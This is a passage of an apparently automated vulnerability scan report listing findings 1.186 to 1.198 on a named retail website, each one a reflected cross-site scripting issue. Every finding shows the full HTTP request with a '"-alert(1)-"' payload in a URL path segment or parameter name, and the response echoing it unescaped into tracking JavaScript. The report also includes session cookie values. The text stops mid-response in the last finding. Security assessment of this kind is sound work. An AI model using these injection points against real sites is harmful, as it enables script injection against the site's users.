Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rc2pet95p1bot5enhh22lhvkg2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> new-sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1");
//]]>
...[SNIP]...

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24fed"-alert(1)-"4376cc421d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3r53k1uir2nojsecqug4val937; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/");
//]]>
...[SNIP]...

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19601"-alert(1)-"aa600d1ea66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bqm75d6efa21b78apj8pid2ip4; expires=Tue, 09-Nov-2010 17:19:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/");
//]]>
...[SNIP]...

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4ef"-alert(1)-"8619217da8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28ijbt4pspljfvkbg1krqmmf86; expires=Tue, 09-Nov-2010 17:19:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/");
//]]>
...[SNIP]...

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3b5"-alert(1)-"13b0e4c6bfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pt1ta4js8a2p84pfab7quviqo1; expires=Tue, 09-Nov-2010 17:17:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1");
//]]>
...[SNIP]...

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3425"-alert(1)-"58b57485b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b9c99toatbkak9qdctggl2tgm1; expires=Tue, 09-Nov-2010 17:16:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/");
//]]>
...[SNIP]...

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21758"-alert(1)-"0c629b616a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oeoprbob6gvfv4g1sfdilovuj6; expires=Tue, 09-Nov-2010 17:16:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/");
//]]>
...[SNIP]...

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987c1"-alert(1)-"18bec130932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts987c1"-alert(1)-"18bec130932/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c2tjvetsb3nuc82tgrnhdpph7; expires=Tue, 09-Nov-2010 17:16:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts987c1"-alert(1)-"18bec130932/");
//]]>
...[SNIP]...

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee86e"-alert(1)-"ca169360927 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9v6frfiehl9h83t9b8vh29f4v0; expires=Tue, 09-Nov-2010 17:14:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1");
//]]>
...[SNIP]...

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6071"-alert(1)-"d29439e175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editione6071"-alert(1)-"d29439e175/women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sij4c4sr0g9sobd42obfm75li6; expires=Tue, 09-Nov-2010 17:14:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editione6071"-alert(1)-"d29439e175/women/skirts/");
//]]>
...[SNIP]...

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec008"-alert(1)-"80aa6a98e3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=go8661utj997ijktrdilvrbo94; expires=Tue, 09-Nov-2010 17:15:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/");
//]]>
...[SNIP]...

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 361b2"-alert(1)-"f83ab23d34f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oei1spgobhg9om8dfjglfbemp2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/");
//]]>
...[SNIP]...

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af0b4"-alert(1)-"a8e2f292ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lkctfmg7af0li5fi70bo9nkir1; expires=Tue, 09-Nov-2010 17:14:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1");
//]]>
...[SNIP]...

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9eb"-alert(1)-"50f709e851f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
